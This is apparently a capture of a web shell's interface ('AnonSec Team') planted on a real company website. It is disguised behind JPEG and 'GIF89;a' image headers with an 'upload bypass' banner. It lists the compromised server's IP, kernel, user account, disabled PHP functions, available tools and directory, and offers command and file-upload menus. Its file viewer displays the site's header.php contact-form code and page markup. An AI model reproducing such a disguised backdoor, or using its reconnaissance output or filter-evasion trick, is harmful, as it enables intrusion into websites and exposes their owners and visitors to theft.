����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������ Xzourt Bypazz

Upload your file


�����x������x������C�     ���C   ����<�d"�������������� �������}�!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�������������������������������������������������������������������������������� ������w�!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������ ��?��S��(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(���(��ÿØÿà JFIF ÿþ;GIF89;aGIF89;aGIF89;a AnonSec Team
AnonSec Team
Server IP : 103.191.208.227  /  Your IP : 18.218.31.91
Web Server : LiteSpeed
System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
User : mhmsfzcs ( 1485)
PHP Version : 8.1.31
Disable Function : show_source, system, shell_exec, passthru, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/mhmsfzcs/vflyorions.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/mhmsfzcs/vflyorions.com/header.php
<?php
include 'db.php';

if(isset($_POST['save']))
{
   
    $name = $_POST['name'];
    $email = $_POST['email'];
     $contact = $_POST['contact'];
    $message = $_POST['message'];
   
   
   
     // Prepare and bind SQL statement
    $stmt = $conn->prepare("INSERT INTO enquiries (name, email,contact, message) VALUES (?, ?, ?,?)");
    $stmt->bind_param("ssss", $name, $email,$contact, $message);

    
      if ($stmt->execute() === TRUE) {
        //$to = "Komalcalls.us@gmail.com"; // Fix the variable name
         $to = "vflyorions2020@gmail.com";
        // $to = "anup.c@vflyorions.com";
        $subject = "Candidates Details";
        $message = "
        <html>
        <head>
        <title>Vflyorions Website Lead</title>
        </head>
        <body>
        <p>Student information is -</p>
        <br>
        <p>Name : " . $name . "</p>
        <p>Email : " . $email . "</p>
       
        <p>Contact : " . $contact . "</p>
        <p>Message : " . $message . "</p>
        
        </body>
        </html>
        ";

        $headers = "MIME-Version: 1.0" . "\r\n";
        $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
        $headers .= 'From: <anup@vflyorions.com>' . "\r\n";

        if (mail($to, $subject, $message, $headers)) {
            // header('Location: index.php');
            // exit;
            
            
         $_SESSION['status']="Thanks for contact us !";
         $_SESSION['status_code']="success";
         

         
        } else {
            die("Sorry, but the email could not be sent. Please go back and try again!");
        }
    } else {
        die("Sorry, but there was an error processing your registration. Please try again!");
    }
}

?>

<!DOCTYPE html>
<html lang="en">

<head>
    <!-- ========== Meta Tags ========== -->
    <!--<meta charset="UTF-8">-->
    <!--<meta http-equiv="X-UA-Compatible" content="IE=edge">-->
    <!--<meta name="viewport" content="width=device-width, initial-scale=1.0">-->
    <!--<meta name="author" content="modinatheme">-->
    <!-- ======== Page title ============ -->
    <!--<title>BPO Voice and Non-Voice Service Provider | Vflyorions</title>-->
    <!-- ========== Favicon Icon ========== -->
    <link rel="shortcut icon" href="assets/img/logo.png">
    <!-- ===========  All Stylesheet ================= -->
    <!--  Icon css plugins -->
    <link rel="stylesheet" href="assets/css/icons.css">
    <!--  animate css plugins -->
    <link rel="stylesheet" href="assets/css/animate.css">
    <!--  magnific-popup css plugins -->
    <link rel="stylesheet" href="assets/css/magnific-popup.css">
    <!--  owl carosuel css plugins -->
    <link rel="stylesheet" href="assets/css/owl.carousel.min.css">
    <!-- metis menu css file -->
    <link rel="stylesheet" href="assets/css/metismenu.css">
    <!--  owl theme css plugins -->
    <link rel="stylesheet" href="assets/css/owl.theme.css">
    <!--  Bootstrap css plugins -->
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <!--  main style css file -->
    <link rel="stylesheet" href="assets/css/style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <!-- template main style css file -->
    <link rel="stylesheet" href="style.css">
    
</head>

<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-D0S555EQRX"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-D0S555EQRX');
</script>

<style>
    .course-btn{
        background: #ff5e14;
    color: white;
    padding: 9px 20px;
   }
   .course-btn:hover{
       color:white;
       background:black;
   }
   .active{
       color:#ff5e14 !important ;
   }
   
   
     /* Popup styling */
    .popup-overlay {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.5);
      display: flex;
      justify-content: center;
      align-items: center;
      z-index: 999;
      opacity: 0;
      pointer-events: none;
      transition: all 0.3s ease;
    }
    .popup-content {
      background-color: #f9f9f9;
      padding: 20px;
      border-radius: 10px;
      box-shadow: 0 0 20px rgba(0, 0, 0, 0.3);
      max-width: 400px;
      text-align: center;
      position: relative;
    }
    .close-btn {
      position: absolute;
      top: 10px;
      right: 10px;
      cursor: pointer;
    }
    .close-btn:hover {
      color: red;
    }


input[type="text"] {
    width: -webkit-fill-available;
    padding: 12px;
    margin: 0 32px;
}

input[type="email"] {
    width: -webkit-fill-available;
    padding: 12px;
    margin: 0 32px;
}

.textarea{
  width: -webkit-fill-available;
    padding: 12px;
    margin: 0 32px;
}

</style>
<body class="body-wrapper">    
   
 <!-- /.offset-menu --> 

<style>
       .marquee1 
       {
    width: 100%;
   background: linear-gradient(to right, #ff5e146b, #ffeacc, #ff5e146b);

    /padding: 10px 0;/
      }
    </style>

<!--<div class="marquee1">-->
<!--    <marquee direction="left" behavior="scroll" direction="left" scrollamount="7">-->
<!--        <h1 style="    color: #080862;-->
<!--    letter-spacing: 2px;margin-top:16px;text-transform:capitalize;-->
<!--    font-size: 17px;"><img src="assets/img/elioradiwali11.png" style="width:72px"> -->
<!--    Wishing You A Prosperous Diwali From Vflyorions Technologies Pvt. Ltd! -->
<!--    <img src="assets/img/elioradiwali22.png" style="width:72px;">Wishing You A Prosperous Diwali From Vflyorions Technologies Pvt. Ltd! <img src="assets/img/elioradiwali11.png" style="width:72px;"> Wishing You A Prosperous Diwali From Vflyorions Technologies Pvt. Ltd!  <img src="assets/img/elioradiwali22.png" style="width:72px;"> Wishing You A Prosperous Diwali From Vflyorions Technologies Pvt. Ltd!  <img src="assets/img/elioradiwali11.png" style="width:72px;">Wishing You A Prosperous Diwali From Vflyorions Technologies Pvt. Ltd!  <img src="assets/img/elioradiwali22.png" style="width:72px;"> Wishing You A Prosperous Diwali From Vflyorions Technologies Pvt. Ltd!  <img src="assets/img/elioradiwali11.png" style="width:72px;"> Wishing You A Prosperous Diwali From Vflyorions Technologies Pvt. Ltd!  <img src="assets/img/elioradiwali22.png" style="width:72px;"> Wishing You A Prosperous Diwali From Vflyorions Technologies Pvt. Ltd!  <img src="assets/img/elioradiwali11.png" style="width:72px;"> Wishing You A Prosperous Diwali From Vflyorions Technologies Pvt. Ltd!  <img src="assets/img/elioradiwali22.png" style="width:72px;">Wishing You A Prosperous Diwali From Vflyorions Technologies Pvt. Ltd!  <img src="assets/img/elioradiwali11.png" style="width:72px;">   </h1>-->
<!--        </marquee>-->
<!--</div>-->

   <!-- welcome content start from here -->
    <header class="header-wrap header-1" id="world">
         <div class="container-fluid d-flex justify-content-between align-items-center">
                  <div class="logo">
                     <a href="index.php">
                     <img src="assets/img/logo.png" alt="logo" style="margin-top:-17px">
                     </a>
                  </div>
                  <nav>
                     <div class="header-right-area d-flex1" >
                        <div id="navbar">
                           <div class="main-menu "  popover id="box" style="display: contents !important;">
                              <ul class="nav-links">
                                  <li><a href="index.php" class="<?php if($page == 'home'){echo 'active';} ?>">Home</a></li>
                                 <li><a href="about.php" class="<?php if($page == 'about'){echo 'active';} ?>">About</a></li>
                                 <li>
                                    <a class="<?php if($pages == 'services'){echo 'active';} ?>" >Services <i class="fal fa-plus"></i></a>
                                    <ul class="sub-menu">
                                         <li><a href="our_plans.php" class="<?php if($page == 'dataentry'){echo 'active';} ?>">Data Entry</a></li>
                                       <li><a href="voiceprocess.php" class="<?php if($page == 'voiceprocess'){echo 'active';} ?>">Voice Process</a></li>
                                       <li><a href="nonvoiceprocess.php" class="<?php if($page == 'nonvoiceprocess'){echo 'active';} ?>">Non Voice Process</a></li>
                                       <li><a href="websitedevelopment.php" class="<?php if($page == 'corporatetraining'){echo 'active';} ?>" >Website Developement</a></li>
                                    </ul>
                                 </li>
                                 
                                 <li><a href="courses.php" class="<?php if($page == 'courses'){echo 'active';} ?>">Courses <i class="fal fa-plus"></i></a>
                                 <ul class="sub-menu">
                                       <!--<li><a href="blog.php" class="<?php if($page == 'blog'){echo 'active';} ?>">Blog</a></li>-->
                                       <li><a href="https://vflyorions.com/coursedetails.php?id=5">FrontEnd Developer</a></li>
                                        <li><a href="https://vflyorions.com/coursedetails.php?id=6">PHP FullStack Developer</a></li>
                                         <li><a href="https://vflyorions.com/coursedetails.php?id=7">Python Developer</a></li>
                                          <li><a href="https://vflyorions.com/coursedetails.php?id=8">Mern Stack Developer</a></li>
                                           <li><a href="https://vflyorions.com/coursedetails.php?id=9">ReactJS</a></li>
                                            <li><a href="https://vflyorions.com/coursedetails.php?id=10">NodeJS</a></li>
                                             <li><a href="https://vflyorions.com/coursedetails.php?id=11">Wordpress Developer</a></li>
                                              <li><a href="https://vflyorions.com/coursedetails.php?id=13">Java Developer</a></li>
                                               <li><a href="https://vflyorions.com/coursedetails.php?id=12">Graphic Designer</a></li>
                                                <li><a href="https://vflyorions.com/coursedetails.php?id=14">Digital Marketing</a></li>
                                    </ul></li>
                                   <li>
                                    <a class="<?php if($pages == 'pages'){echo 'active';} ?>"  >Blog <i class="fal fa-plus"></i></a>
                                    <ul class="sub-menu">
                                       <li><a href="blog.php" class="<?php if($page == 'blog'){echo 'active';} ?>">Blog</a></li>
                                       <li><a href="https://tutorial.vflyorions.in/">Tutorial</a></li>
                                    </ul>
                                 </li>
                                 
                                  <li><a href="career.php" class="<?php if($page == 'career'){echo 'active';} ?>">Career</a></li>

                              
                                   <li>
                                    <a href="payment.php" class="<?php if($pages == 'pay'){echo 'active';} ?>"  >Make Payment </a>
                        
                                 </li>

                                 <li><a href="contact.php" class="<?php if($page == 'contact'){echo 'active';} ?>">Contact</a></li>
                              </ul>
                           </div>
                        </div>
                        <a href="http://vflyorion.com/" class="theme-btn  d-sm-block">Login</a>
                     </div>
                     <!--  <ul class="nav-links">
                        <li><a href="#">Home</a></li>
                        <li><a href="#">About</a></li>
                        <li><a href="#">Services</a></li>
                        <li><a href="#">Contact</a></li>
                        </ul> -->
                     <div class="menu-toggle">&#9776;</div>
                  </nav>
         </div>
    </header>
    
    
      <div class="hero-social-elements d-none d-xxl-block">
        <div class="flp-text">
            <p>Follow Us</p>
        </div>
        <div class="long-arrow"></div>
        <div class="social-link">
            <a href="https://www.facebook.com/vflyorionstechologies" target="_blank"><i class="fab fa-facebook-f"></i></a>
            <a href="https://www.instagram.com/vflyorions_ngp/"  target="_blank"><i class="fab fa-instagram"></i></a>
            <a href="https://www.linkedin.com/company/vflyorions-technologies-pvt-ltd/mycompany/" target="_blank"><i class="fab fa-linkedin-in"></i></a>
             <a href="https://www.youtube.com/channel/UC_ZsCfvJgZYqOUc9IVxAQqQ" target="_blank"><i class="fab fa-youtube"></i></a>
        </div>
    </div>
    
    <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
<?php  if(isset($_SESSION['status']) && $_SESSION['status']!='') { ?>
 <script>
        new swal({
            title: "<?php echo $_SESSION['status']; ?>",
            //text: "You clicked the button!",
            icon: "<?php echo $_SESSION['status_code']; ?>",
            button: "OK",
        }).then(function() {
            var newTab = window.open(" ");
            if (newTab) {
                newTab.focus();
            } else {
                alert('Please allow popups for this website');
            }
        });
    </script>

<?php
   unset($_SESSION['status']);
   }
   ?>
    

AnonSec - 2021